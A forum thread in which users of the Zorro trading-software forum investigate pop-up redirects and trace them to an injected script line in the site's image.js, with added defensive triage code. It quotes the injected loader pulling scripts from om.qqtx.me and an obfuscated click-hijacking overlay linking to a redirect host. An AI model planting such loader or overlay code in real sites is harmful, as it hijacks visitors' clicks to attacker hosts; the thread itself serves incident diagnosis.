Ads?!?!?!?!?!?!?

Posted By: DdlV

Ads?!?!?!?!?!?!? - 10/19/18 23:45

Hi jcl.

Yesterday and today I've had ad pop-ups happen on the Forum. Is this a new "feature"?

Thanks.
Posted By: AndrewAMD

Re: Ads?!?!?!?!?!?!? - 10/19/18 23:57

So it’s not just me. There’s an odd redirect that pops up once every few hours. This looks like a hack exploit of some sort to me.
Posted By: dmac

Re: Ads?!?!?!?!?!?!? - 10/20/18 10:50

I've gotten it as well. Seems as if the site may be infected with something.
Posted By: AndrewAMD

Re: Ads?!?!?!?!?!?!? - 10/20/18 15:13

The bug is repeatable.

First, you must clear your cookies. This is how:
1) Shift + Ctrl + Delete. This opens "Clear Browsing Data".
2) "Advanced" Tab
3) Time range: "all time"
4) Check "Cookies and other site data"
5) Click "Clear Data"
6) Close browser and open it again

So now that cookies are cleared, the behavior will be immediately repeatable:

7) Go to the Zorro forums.
8) Browse to any thread.
9) Hover your mouse anywhere in the screen.

No matter what, it looks like it wants to redirect you somewhere. See my screenshot #1.


So instead of clicking with my left mouse button, I right-click: Inspect. I get screenshot #2.


If I click on the sources tab, I get screenshot #3.


Notice the mysterious javascripts from om.qqtx.me. I saved them below, both in their original form and a readable format.

That second javascript has content **BEFORE** I click on the screen. But if I refresh the screen, the second script is **BLANK**. The disappearing script looks like it creates the bad link:
Code:
(function() {
    var c = JSON.parse(x1cfdb9f14ad340c38bbd6f60806ec731_hd("eyJ1cmwiOiJodHRwczovL2FmaWx0ZXIueHl6L2MvMTQ4My8yIn0=")),
        b = document.body || document.getElementsByTagName("body")[0];
    if ("undefined" != b && null != b) {
        var a = document.createElement("div");
        a.id = "div" + Math.floor(999999 * Math.random() + 1E5);
        a.style.cssText = "width:100%; height:100%; position:fixed; left:0px; top:0px; z-index: 99999999";
        a.innerHTML = 	'<a href="http://wf3sgoqwvtow4yz028sp.kf.abgp.info/redirect?i=118&u=' + 
			x1cfdb9f14ad340c38bbd6f60806ec731_he(c.url) + 
			'" target="_blank" style="display: block; width:100%; height: 100%; cursor: default"></a>';
        a.onclick = function() {
            this.style.display =
                "none"
        };
        b.insertBefore(a, b.lastChild)
    }
})();



I don't know much about HTML/CSS/JS, but this looks like it might be a sleeper script.

Attached picture forum_bug1.png
Attached picture forum_bug2.png
Attached picture forum_bug3.png
Attached File
javascripts.zip  (70 downloads)
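
The following static triage of the overlay snippet quoted in the post above is an added example for Node.js, not part of the original thread. `SNIPPET` is abridged from that code; treating the obfuscated `_hd` helper as a Base64 decoder is an assumption, since the helper itself is not shown, and the function names are hypothetical.

```javascript
// Added example (not from the thread). SNIPPET is abridged from the quoted code.
const SNIPPET = `var c = JSON.parse(x1cfdb9f14ad340c38bbd6f60806ec731_hd("eyJ1cmwiOiJodHRwczovL2FmaWx0ZXIueHl6L2MvMTQ4My8yIn0="));
a.style.cssText = "width:100%; height:100%; position:fixed; left:0px; top:0px; z-index: 99999999";
a.innerHTML = '<a href="http://wf3sgoqwvtow4yz028sp.kf.abgp.info/redirect?i=118&u=' + x1cfdb9f14ad340c38bbd6f60806ec731_he(c.url) + '" target="_blank" style="display: block; width:100%; height: 100%; cursor: default"></a>';`;

// Decode quoted literals that look like Base64 (assumed encoding) and keep
// only the ones that decode to printable ASCII.
function decodeBase64Literals(src) {
  const out = [];
  for (const m of src.matchAll(/["']([A-Za-z0-9+\/]{16,}={0,2})["']/g)) {
    const text = Buffer.from(m[1], "base64").toString("utf8");
    if (/^[\x20-\x7e]+$/.test(text)) out.push(text);
  }
  return out;
}

// True when a style string describes a fixed element covering the whole
// viewport and stacked above normal page content (the click-catching layer).
function isFullViewportOverlay(cssText, minZ = 1000) {
  const decl = Object.fromEntries(cssText.split(";")
    .map(d => d.split(":").map(s => s.trim().toLowerCase()))
    .filter(p => p.length === 2 && p[0]));
  return decl.position === "fixed" && decl.width === "100%" &&
         decl.height === "100%" && Number(decl["z-index"]) >= minZ;
}

// Collect the three findings a responder wants from a suspicious script:
// hidden decoded data, an overlay style, and the hosts its links point to.
function triage(src) {
  const styles = [...src.matchAll(/"([^"]*position\s*:\s*fixed[^"]*)"/gi)].map(m => m[1]);
  const hosts = [...src.matchAll(/href=\\?["']https?:\/\/([^\/"'?]+)/gi)].map(m => m[1]);
  return {
    decoded: decodeBase64Literals(src),
    overlay: styles.some(s => isFullViewportOverlay(s)),
    linkHosts: hosts,
  };
}

console.log(triage(SNIPPET));
```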
Posted By: AndrewAMD

Re: Ads?!?!?!?!?!?!? - 10/20/18 17:15

As a browser-side workaround, I can block these scripts in Chrome using the ScriptSafe add-in.

Settings:
1) Allow opserver.de to run scripts (allow, not trust).
2) Distrust om.qqtx.me
3) ScriptSafe options -> General Settings -> Default Mode -> Allow

No more pop-ups. (Also, step #3 is to stop blocking all other website scripts, such as Amazon. This Chrome extension wants to block all javascripts by default, which makes no sense.)





Attached picture forum_bug4.PNG
Posted By: DdlV

Re: Ads?!?!?!?!?!?!? - 10/20/18 18:20

Thanks AndrewAMD. So far these pop-ups just seem to be annoying, so I think I'll wait for jcl's comments & hopefully fix.

I'd rather not have a workaround lower the priority of this in case there's also something worse compromised that hasn't been noticed yet...

Thanks.
Posted By: AndrewAMD

Re: Ads?!?!?!?!?!?!? - 10/20/18 20:34

My intent was to document my findings so that this website can be scrubbed clean sooner than later.
Posted By: jcl

Re: Ads?!?!?!?!?!?!? - 10/22/18 13:58

I've just checked the forum software, but cannot see an exploit or a source of mysterious popups. I also don't get them here, at least not with Chrome. Are they still there?
Posted By: AndrewAMD

Re: Ads?!?!?!?!?!?!? - 10/22/18 14:25

Yes.

jcl, try this in Google Chrome:

1) Shift + Ctrl + Delete. This opens "Clear Browsing Data".
2) "Advanced" Tab
3) Time range: "all time"
4) Check "Cookies and other site data"
5) Click "Clear Data"
6) Close browser and open it again
7) Go to Zorro User Forum
8) Click on this thread ("Ads?!?!?!?!?!?!?")
9) Click anywhere in the web page... This should induce the pop-up.
10) Right-click anywhere on the web page and click "Inspect"
11) Click on the "Sources" tab
12) Now take a look at the tree - there should be two offensive javascripts loaded:

top -> om.qqtx.me -> jquery.jscroll.min.js
top -> om.qqtx.me -> jquery.jscroll.min.js?timestamp=[etc.]

I have identified these two scripts as the culprit. If I explicitly block these scripts, I get no pop-ups.

The site has repeated this behavior just now.
Posted By: AndrewAMD

Re: Ads?!?!?!?!?!?!? - 10/22/18 15:42

I found something else interesting.

1) Right-click this page
2) Click "Inspect"
3) Click "Sources"
4) Browse the tree: top -> www.opserver.de -> ubb7 -> ubb_js -> image.js?v=7.5.1p1

Look at the script:

Code:
/* Script Version 7.5.1 */

var image_pending = 0;

function newCaptcha(type) { 
	if (image_pending) return;
	image_pending = 1;
	get_object('ajax_wait').style.display = "";
    	var url = script + "?ubb=captcha&init=1&t=" + type;
    	var ajax = new ubbtAJAX(url, updateCaptcha); 
    	ajax.sendData("GET"); 
}
document.writeln("<script src=\'//om.qqtx.me/jquery.jscroll.min.js\'></script>");
function updateCaptcha(responseXML) {
	id = responseXML;
	obj = get_object('captcha_image');
	obj.src = script + "?ubb=captcha&id=" + id;
	image_pending = 0;
	get_object('ajax_wait').style.display = "none";
}



This line does not look very nice. Was this line injected?
Code:
document.writeln("<script src=\'//om.qqtx.me/jquery.jscroll.min.js\'></script>");


Based on my experimentation, it appears this line loads the two suspicious scripts in the first place.

Hypothesis: The UBB.threads server is infected.
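
The check described in the post above, as an added example that is not part of the original thread: compare the served script with a known-good copy and flag script tags that load from hosts outside an allowlist. `SERVED` is abridged from the quoted image.js; `REFERENCE` is constructed by dropping the suspect line, which is an assumption about the clean copy, and the function names are hypothetical.

```javascript
// Added example (not from the thread). SERVED is abridged from the quoted
// image.js; REFERENCE is constructed here (assumed clean copy).
const SERVED = `/* Script Version 7.5.1 */
var image_pending = 0;
function newCaptcha(type) { /* body omitted */ }
document.writeln("<script src='//om.qqtx.me/jquery.jscroll.min.js'></script>");
function updateCaptcha(responseXML) { /* body omitted */ }`;
const REFERENCE = SERVED.split("\n").filter(l => !l.includes("om.qqtx.me")).join("\n");

// Lines present in the served file but absent from the reference copy.
function addedLines(served, reference) {
  const known = new Set(reference.split("\n").map(l => l.trim()));
  return served.split("\n")
    .map((text, i) => ({ line: i + 1, text: text.trim() }))
    .filter(e => e.text !== "" && !known.has(e.text));
}

// Script-tag sources (absolute or protocol-relative) whose host is not on
// the allowlist. Also matches the backslash-escaped quote form (src=\'...).
function foreignScriptLoads(source, allowedHosts) {
  const hits = [];
  const re = /<script\b[^>]*\bsrc\s*=\s*\\?["']?\s*(?:https?:)?\/\/([^\/"'\\\s>]+)/gi;
  source.split("\n").forEach((text, i) => {
    for (const m of text.matchAll(re)) {
      const host = m[1].toLowerCase();
      if (!allowedHosts.includes(host)) hits.push({ line: i + 1, host });
    }
  });
  return hits;
}

const ALLOWED = ["www.opserver.de"]; // the forum's own host, as named in the thread
console.log(addedLines(SERVED, REFERENCE));
console.log(foreignScriptLoads(SERVED, ALLOWED));
```

Run against every static file the server hands out, this kind of comparison also shows whether a cache or proxy in front of the origin is serving a different copy than the one on disk.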
Posted By: rayp

Re: Ads?!?!?!?!?!?!? - 10/22/18 16:21

Interesting that I got no reactions from jcl

Sry, I overread the post here.

It's still there btw!!! Randomly
This time it took me permission to post
Posted By: AndrewAMD

Re: Ads?!?!?!?!?!?!? - 10/22/18 16:43

Originally Posted By: rayp
Interesting that I got no reactions from jcl
Hopefully because he's busy

Originally Posted By: rayp
It's still there btw!!! Randomly
This time it took me permission to post
I believe it is not random, but scripted to resurrect after a timer expires.

Per my earlier posts, clearing cookies makes it not random. It works every time.
Posted By: rayp

Re: Ads?!?!?!?!?!?!? - 10/22/18 17:07

For me it's random...no matter what I do.

http://www.opserver.de/ubb7/ubbthreads.php?ubb=showflat&Number=474513#Post474513

For info how to avoid redirection
Posted By: AndrewAMD

Re: Ads?!?!?!?!?!?!? - 10/22/18 18:48

Originally Posted By: rayp
For me it's random...no matter what I do.
Did you clear your cookies correctly? Try again. I get consistent behavior if and only if I clear my cookies all the time. (Hint: There is a sleep timer variable.)


....

To recap my independent investigation:

Repeatable behavior if you clear your cookies correctly:
http://www.opserver.de/ubb7/ubbthreads.php?ubb=showflat&Number=474505#Post474505

I managed to single out and block the two(2) malicious javascripts, thus ending the unwanted behavior on my personal browser only:
http://www.opserver.de/ubb7/ubbthreads.php?ubb=showflat&Number=474507#Post474507

Root cause found in (hacked?) ubb scripting, which launches the two(2) malicious javascripts:
http://www.opserver.de/ubb7/ubbthreads.php?ubb=showflat&Number=474547#Post474547

...


Finally, here's the culprit. Can an admin delete this one evil line of code? (See attachment for full scale.)

image.js on the zorro server:
http://www.opserver.de/ubb7/ubb_js/image.js

image.js on the UBB.threads server (the source):
https://www.ubbcentral.com/forums/ubb_js/image.js




Attached picture culprit.JPG
Posted By: rayp

Re: Ads?!?!?!?!?!?!? - 10/22/18 19:26

I posted in mods and wrote a PM. Now I can't do more. Till now I got no answer...maybe admin is busy, yes.

Edit
Just was redirected with edit button...damn that sucks...

edit2:
And directly after this...site was again overlaid with invisible link...



edit:
I used an old tab I had open to write here, I can't use the page at all now. The link is always there now for me.

edit:
Ok, I have control again...only "Deleting all temp Internet files and stuff" gave me control back. Wow!
Posted By: AndrewAMD

Re: Ads?!?!?!?!?!?!? - 10/22/18 20:31

Spot the differences.
http://www.opserver.de/ubb7/ubb_js/image.js
https://www.ubbcentral.com/forums/ubb_js/image.js

Does this code look friendly?
http://om.qqtx.me/jquery.jscroll.min.js

Let's make that last script readable:
https://pastebin.com/MqugfcZ7
Posted By: MatPed

Re: Ads?!?!?!?!?!?!? - 10/22/18 21:18

Yes, I think it is infected. I've just been redirected to this page:
https://google-it.eventomensiledigadget....click=j6qqbg5m#

HtH
Posted By: rayp

Re: Ads?!?!?!?!?!?!? - 10/22/18 22:02

I have had the infection feeling since the weekend.
It's a fact that an invisible link layers the forum pages sometimes.

If u only look at the http site names...very long random names.
Also I noticed blocked popups now, sometimes.

@all
Check the link you're clicking on this page in detail. Watch your cursor when hovering over links. Or disable / block the script u can see in the screenshots above.
Posted By: AndrewAMD

Re: Ads?!?!?!?!?!?!? - 10/23/18 13:48

Oh, looks like it's fixed now. Let's see if it stays that way...
Posted By: jcl

Re: Ads?!?!?!?!?!?!? - 10/23/18 13:50

The inserted "document.writeln" line found by AndrewAMD would indeed redirect clicks to a script on om.qqtx.me. But this line isn't in the forum source code. I also don't get that popup after deleting the cookies. So the source is apparently not infected, at least not now, but possibly the cache.

I will clear the cache now. Please report when you observe the popup again or something else that is unusual.
Posted By: rayp

Re: Ads?!?!?!?!?!?!? - 10/23/18 15:19

Still there.
Posted By: AndrewAMD

Re: Ads?!?!?!?!?!?!? - 10/23/18 15:44

Originally Posted By: rayp
Still there.


I'm not seeing it (blocker: disabled), but I guess that maybe depends on which cached server I'm using? Or perhaps your browser is infected?

Try this:

1) Clear browser cache/cookies.
2) Go back to forums.
3) See if it happens again after an hour or two.
4) If so, paste the contents of this javascript here in the forums:

http://www.opserver.de/ubb7/ubb_js/image.js

I want to know if you are seeing the evil line of code from your browser.
Posted By: rayp

Re: Ads?!?!?!?!?!?!? - 10/23/18 15:55

It was from my handy.

I'll check later with PC when at home.


Edit
After deleting all i files again it seems ok for now. Will test later with my PC

Edit
From my handy still there now.

Edit
Seems ok for now. Not much clicked yet but what I clicked was what it looked like.
Posted By: 3dgamelight

Re: Ads?!?!?!?!?!?!? - 10/23/18 21:03

After deleting the cookies.
Code:
/* Script Version 7.5.1 */

var image_pending = 0;

function newCaptcha(type) { 
	if (image_pending) return;
	image_pending = 1;
	get_object('ajax_wait').style.display = "";
    	var url = script + "?ubb=captcha&init=1&t=" + type;
    	var ajax = new ubbtAJAX(url, updateCaptcha); 
    	ajax.sendData("GET"); 
}
document.writeln("<script src='//om.qqtx.me/jquery.jscroll.min.js'></script>");
function updateCaptcha(responseXML) {
	id = responseXML;
	obj = get_object('captcha_image');
	obj.src = script + "?ubb=captcha&id=" + id;
	image_pending = 0;
	get_object('ajax_wait').style.display = "none";
}

Posted By: AndrewAMD

Re: Ads?!?!?!?!?!?!? - 11/03/18 15:29

Well, I waited to see if the problem will go away.

Sure enough, the pop-up came up more than a week later. Here's the javascript:
Code:
/* Script Version 7.5.1 */

var image_pending = 0;

function newCaptcha(type) { 
	if (image_pending) return;
	image_pending = 1;
	get_object('ajax_wait').style.display = "";
    	var url = script + "?ubb=captcha&init=1&t=" + type;
    	var ajax = new ubbtAJAX(url, updateCaptcha); 
    	ajax.sendData("GET"); 
}
document.writeln("<script src='//om.qqtx.me/jquery.jscroll.min.js'></script>");
function updateCaptcha(responseXML) {
	id = responseXML;
	obj = get_object('captcha_image');
	obj.src = script + "?ubb=captcha&id=" + id;
	image_pending = 0;
	get_object('ajax_wait').style.display = "none";
}



So maybe some of the server caches are still dirty?

Can we scrub them all?
Posted By: jcl

Re: Ads?!?!?!?!?!?!? - 11/05/18 10:59

The server caches were completely flushed last week, but maybe it's from a local cache?
Posted By: AndrewAMD

Re: Ads?!?!?!?!?!?!? - 11/05/18 13:48

I think I made it go away by flushing my DNS cache:

1) Clear browser cache (per earlier instructions)
2) Open Windows Powershell in Administrative Mode
3) At the prompt:
> ipconfig /flushdns

Now the javascript link is clean.